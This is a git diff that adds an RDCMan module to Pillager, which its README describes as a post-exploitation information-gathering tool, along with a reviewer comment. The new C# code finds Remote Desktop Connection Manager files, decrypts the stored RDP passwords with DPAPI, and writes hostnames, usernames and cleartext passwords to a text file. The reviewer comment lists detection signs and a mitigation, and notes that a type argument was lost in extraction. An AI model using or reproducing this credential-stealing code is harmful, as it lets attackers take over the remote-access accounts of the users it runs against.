diff --git a/Pillager/Pillager.csproj b/Pillager/Pillager.csproj
index 7101166..991ee2a 100644
--- a/Pillager/Pillager.csproj
+++ b/Pillager/Pillager.csproj
@@ -77,6 +77,7 @@
+
diff --git a/Pillager/Program.cs b/Pillager/Program.cs
index 1bbf418..5a0f6e8 100644
--- a/Pillager/Program.cs
+++ b/Pillager/Program.cs
@@ -30,6 +30,7 @@ namespace Pillager
MobaXterm.Save(savepath);
Xmanager.Save(savepath);
Navicat.Save(savepath);
+ RDCMan.Save(savepath);
//Messengers
QQ.Save(savepath);
diff --git a/Pillager/Tools/RDCMan.cs b/Pillager/Tools/RDCMan.cs
new file mode 100644
index 0000000..a48fd76
--- /dev/null
+++ b/Pillager/Tools/RDCMan.cs
@@ -0,0 +1,114 @@
+using Microsoft.Win32;
+using System;
+using System.Collections.Generic;
+using System.IO;
+using System.Linq;
+using System.Security.Cryptography;
+using System.Text;
+using System.Xml;
+
+namespace Pillager.Tools
+{
+ internal class RDCMan
+ {
+ public static string ToolName = "RDCMan";
+
+ public static string DecryptPwd()
+ {
+ StringBuilder sb = new StringBuilder();
+ var RDGFiles = new List();
+ var RDCManSettings = new XmlDocument();
+ string rdgPath = Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData) + @"\Microsoft\Remote Desktop Connection Manager\RDCMan.settings";
+ RDCManSettings.LoadXml(File.ReadAllText(rdgPath));
+ var nodes = RDCManSettings.SelectNodes("//FilesToOpen");
+ foreach (XmlNode node in nodes)
+ {
+ var RDGFilePath = node.InnerText;
+ if (!RDGFiles.Contains(RDGFilePath))
+ {
+ RDGFiles.Add(RDGFilePath);
+ }
+ }
+ foreach (string RDGFile in RDGFiles)
+ {
+ sb.AppendLine(ParseRDGFile(RDGFile));
+ }
+ return sb.ToString();
+ }
+
+ private static string DecryptPassword(string password)
+ {
+ byte[] passwordBytes = Convert.FromBase64String(password);
+ password = Encoding.UTF8.GetString(ProtectedData.Unprotect(passwordBytes, null, DataProtectionScope.CurrentUser)).Replace("\0", "");
+ return password;
+ }
+
+ private static string ParseRDGFile(string RDGPath)
+ {
+ StringBuilder stringBuilder = new StringBuilder();
+ try
+ {
+ XmlDocument RDGFileConfig = new XmlDocument();
+ RDGFileConfig.LoadXml(File.ReadAllText(RDGPath));
+ XmlNodeList nodes = RDGFileConfig.SelectNodes("//server");
+ foreach (XmlNode node in nodes)
+ {
+ string hostname = string.Empty, profilename = string.Empty, username = string.Empty, password = string.Empty, domain = string.Empty;
+ foreach (XmlNode subnode in node)
+ {
+ foreach (XmlNode subnode_1 in subnode)
+ {
+ switch (subnode_1.Name)
+ {
+ case "name":
+ hostname = subnode_1.InnerText;
+ break;
+ case "profileName":
+ profilename = subnode_1.InnerText;
+ break;
+ case "userName":
+ username = subnode_1.InnerText;
+ break;
+ case "password":
+ password = subnode_1.InnerText;
+ break;
+ case "domain":
+ domain = subnode_1.InnerText;
+ break;
+ }
+ }
+ }
+
+ if (!string.IsNullOrEmpty(password))
+ {
+ var decrypted = DecryptPassword(password);
+ if (!string.IsNullOrEmpty(decrypted))
+ {
+ stringBuilder.AppendLine("hostname: " + hostname);
+ stringBuilder.AppendLine("profilename: " + profilename);
+ stringBuilder.AppendLine("username: " + $"{domain}\\{username}");
+ stringBuilder.AppendLine("decrypted: " + decrypted);
+ stringBuilder.AppendLine();
+ }
+ }
+ }
+ }
+ catch { }
+ return stringBuilder.ToString();
+ }
+
+ public static void Save(string path)
+ {
+ try
+ {
+ string rdgPath = Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData) + @"\Microsoft\Remote Desktop Connection Manager\RDCMan.settings";
+ if (!File.Exists(rdgPath)) return;
+ string savepath = Path.Combine(path, ToolName);
+ Directory.CreateDirectory(savepath);
+ string output = DecryptPwd();
+ if (!string.IsNullOrEmpty(output)) File.WriteAllText(Path.Combine(savepath, ToolName + ".txt"), output);
+ }
+ catch { }
+ }
+ }
+}
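Review bot: RDCMan.cs has no comment saying what it touches, which matters here because `DecryptPassword` returns saved RDP passwords in cleartext and `Save` writes them to `RDCMan.txt` under `savepath`. A class summary such as `/// Reads RDCMan.settings, opens each .rdg file listed under FilesToOpen, and unprotects the stored passwords with DPAPI (CurrentUser scope).` would make that explicit. For a defender the same lines give the observables: a process other than RDCMan itself reading `RDCMan.settings` and the `.rdg` files it references, followed by `ProtectedData.Unprotect`. Because the scope is `DataProtectionScope.CurrentUser`, any code running as that user can recover the passwords, so the mitigation is not to save passwords in `.rdg` files. As rendered, `new List()` in `DecryptPwd` has no type argument; the `foreach (string RDGFile in RDGFiles)` loop suggests `List<string>` was lost when the page was extracted.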
diff --git a/README.md b/README.md
index 66248d1..e64ba67 100644
--- a/README.md
+++ b/README.md
@@ -53,6 +53,7 @@ Pillager是一个适用于后渗透期间的信息收集工具,可以收集目
| MobaXterm | Password/Credential |
| Xmanager | Password |
| Navicat | Password |
+| RDCMan | Password |
| Others | Support |
| :----: | :------: |